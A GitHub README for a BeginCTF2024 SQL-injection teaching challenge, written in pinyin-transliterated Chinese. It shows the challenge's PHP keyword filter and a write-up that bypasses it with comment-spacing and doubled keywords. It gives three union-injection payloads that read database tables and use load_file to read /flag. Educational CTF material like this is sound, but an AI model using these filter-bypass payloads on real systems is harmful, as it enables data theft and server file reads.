Dark Mode

Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly
Sign up
Appearance settings

RealHurrison/beginctf2024_web_sql_tutorial

Folders and files

NameName
Last commit message
Last commit date

Latest commit

History

1 Commit

Repository files navigation

BeginCTF2024 SQLJiao Xue Ju

Ci repoWei Gai Ti Yuan Ma ,Ke Yi Tong Guo Yi Xia Ming Ling Kuai Su Da Jian

dockerfileXie De Xi Lan Shi Fu Men Ma Qing Dian (

docker push kihanahare/2024beginctf_sqldemo:V1

WriteUp

Guan Fang Quan Tao wpFei Shu Zhi Da :https://hjug69b9j6.feishu.cn/docx/V02Rd3MyWoRPVxxTTCOcLutNnqe?from=from_copylink

Shuai Guo :Ti Mu Mei You Wen Ti ,Zhi Shi Ni Na Dao De Di Er Duan flagKe Neng Shi Jia De ,Yin Wei Li Mian 500Tiao Hun Yao Shu Ju ,Zhi You Te Ding De Yi Tiao Shi Zheng Que De

Ben Zhao Jiao Xue De Mu De ,Huan Shi Jian Dan Ti Yi Zui sqlZhu Ru ,Yi Ji Guan Cha wafDe Fang Fa ,Zhe Li Zhi Jie Ba wafFang Chu Lai

|<|and|\|right|substr|replace|char|&|\\\$|sleep| /i', $input, $matches)) { return array(false, $matches[0]); } else { $pattern = "/(select|from|load|or)/i"; $input = preg_replace($pattern, '', $input); return array(true, $input); } }">function waf($input)
{
if (preg_match('/regexp|left|floor|reverse|update|between|=|>|<|and|\|right|substr|replace|char|&|\\\$|sleep| /i', $input, $matches)) {
return array(false, $matches[0]);
} else {
$pattern = "/(select|from|load|or)/i";
$input = preg_replace($pattern, '', $input);
return array(true, $input);
}
}

Ben Zhi Shang Jiu Shi Dui sqlYu Ju De Zhi Jie Pin Jie ,Qie Dui Chuan Ru De Can Shu Mei You Zuo Hao Guo Lu ,Dao Zhi Fei Fa De sqlYu Ju Zhi Xing ,Zhe Yi Dian Zai Qian Duan Zhong Ye Ti Xian Liao ,Ci Chu Cai Yong De Zhu Ru Shou Fa Wei unionZhu Ru ,Ye Jiu Shi Lian He Zhu Ru

  • Di Yi Duan flagWei Yu secretShu Ju Ku passwordBiao De Mou Tiao Shu Ju

Gou Zao De sqlYu Ju Wei :

select ? from secret.password

You Yu Bu Zhi Dao Zi Duan Ming ,Ke Yi Tong Guo Cha Xun information_schema.columnsHuo De Shu Ju ,Gu Ding Shou Fa A ,Ji Hao Liao !

select group_concat(column_name) from information_schema.columns where table_schema=xxx

Ran Hou Kong Ge Rao Guo ,Ci Chu Cai Yong /**/Ji Ke ,Deng Hao Bei Guo Lu Liao Yong likeJi Ke

Fa Xian You Xie Guan Jian Zi Bei Tun Liao ,Shuang Xie Rao Guo Ji Ke ,select -> selselectect

Huo De San Ge Zi Duan Ming ,Cai Yi Xia Shi flag,Cai Bu Dao Ni Jiu Bao

Zong Shang Suo Shu ,Rao Guo wafHou ,Suo Yi Di Yi Ge flagDe payload:

1'/**/union/**/selselectect/**/flag/**/frofromm/**/secret.passwoorrd%23

  • Di Er Duan flagWei Yu Dang Qian Shu Ju Ku scoreBiao ,Xue Sheng beginDe Cheng Ji (grade)

Zheng Yi Zui Da De Di Fang ,Bu Xiang Shou Xuan Shu Ju Jiu Yong whereGao Ding Ji Ke . Gou Zao De sqlYu Ju Wei :

select ? from score where ? = 'begin'

Bu Zhi Dao Zi Duan Ming Yong Shang Mian De Fang Fa Kan Yi Xia Ma !

Rao Guo waf,payloadRu Xia

1'/**/union/**/seleselectct/**/grade/**/frfromom/**/scoorre/**/where/**/student/**/like/**/'begin'/**/%23

Qi Shi Ben Lai Shi Yao Ba beginGuo Lu Diao De ,Dan Shi Hao Xiang Wang Xie Liao ,Ke Yi Xiang Yi Xiang Ru Guo Guo Lu Liao begin,You Zen Yao Zuo

  • Di San Duan flagWei Yu /flag

Jing Dian Zhi load_file,Du Wen Jian Ji Ke

Gou Zao De sqlYu Ju :

select load_file('/flag')

Rao Guo waf,payloadRu Xia

1'/**/union/**/seleselectct/**/loloadad_file('/flag')%23

About

No description, website, or topics provided.

Resources

Readme

Stars

Watchers

Forks

Releases

No releases published

Packages

Contributors